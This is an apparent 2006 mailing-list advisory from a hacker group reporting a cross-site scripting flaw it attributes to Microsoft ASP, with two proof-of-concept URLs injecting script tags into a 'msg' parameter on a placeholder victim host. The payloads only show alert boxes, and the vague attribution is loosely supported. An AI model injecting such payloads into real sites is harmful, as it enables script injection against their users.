Date: Mon Mar 20 18:22:36 2006
From: saiedhackeriran at yahoo.com (saied hackeriran)
Subject: New XSS attack to Microsoft service(ASP)

                 In THe Name Of God
Group:HackeranShiraz
Discoverer:SaiedHacker
/*'============================================*/
We have found a security problem in Microsoft service(ASP).
This problem is a type of XSS attack and occurs while processing The information.
We can cause the problem by a simple (script)code.
Exploit:
alert("SaiedHacker");Http://www.Victim.com/message.asp?msg=<script>alert("SaiedHacker");</script>
  msgbox("SaiedHacker")Http://www.Victim.com/message.asp?msg=<script%20language=vbscript>msgbox("SaiedHacker")</script>
Have time of your life